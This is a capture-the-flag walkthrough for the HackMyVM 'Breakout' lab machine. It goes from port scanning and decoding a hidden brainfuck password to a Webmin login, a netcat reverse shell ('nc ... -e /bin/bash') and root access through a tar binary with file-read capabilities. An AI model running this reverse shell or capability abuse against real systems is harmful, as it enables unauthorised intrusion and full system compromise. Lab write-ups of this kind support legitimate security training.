https://hackmyvm.eu/machines/machine.php?vm=Breakout
Scan ports.
~ nmap -sV -sC -p- -Pn 192.168.33.145 -oN ports.log
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 22:02 CST
Nmap scan report for 192.168.33.145
Host is up (0.0022s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
Host script results:
|_clock-skew: 7h59m58s
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-22T22:03:10
|_ start_date: N/A
Check source code of index.html at port 80.
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->
It's brainfuck code. Decode it online, get string ".2uqPEfj3D<P'a-3".
Use enum4linux to enum.
~ enum4linux 192.168.33.145 | tee enum.log
...
S-1-22-1-1000 Unix User\cyber (Local User)
With username cyber and password we decode from brainfuck code, we can login at port 20000.
In control panel, we found command shell.
Run "nc 192.168.33.128 1234 -e /bin/bash", we can get reverse shell.
~ nc -nlvp 1234 fish-0 | 0 [22:47:24]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.145.
Ncat: Connection from 192.168.33.145:35206.
id
uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
python3 -c 'import pty;pty.spawn("/bin/bash")'
cyber@breakout:~$
Search cap.
cyber@breakout:/$ getcap / -r 2>/dev/null
getcap / -r 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
And we found password backup.
cyber@breakout:/tmp$ ls -la /var/backups
ls -la /var/backups
total 12
drwxr-xr-x 2 root root 4096 Oct 20 07:49 .
drwxr-xr-x 14 root root 4096 Oct 19 13:48 ..
-rw------- 1 root root 17 Oct 20 07:49 .old_pass.bak
We can compress it can extract it in /tmp folder using /home/cyber/tar.
cyber@breakout:/tmp$ /home/cyber/tar -cvf pass.tar /var/backups
/home/cyber/tar -cvf pass.tar /var/backups
/home/cyber/tar: Removing leading `/' from member names
/var/backups/
/var/backups/.old_pass.bak
cyber@breakout:/tmp$ tar -xvf pass.tar
tar -xvf pass.tar
var/backups/
var/backups/.old_pass.bak
cyber@breakout:/tmp$ cd var/backups
cd var/backups
cyber@breakout:/tmp/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h
Finally we get root.
root@breakout:~# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
breakout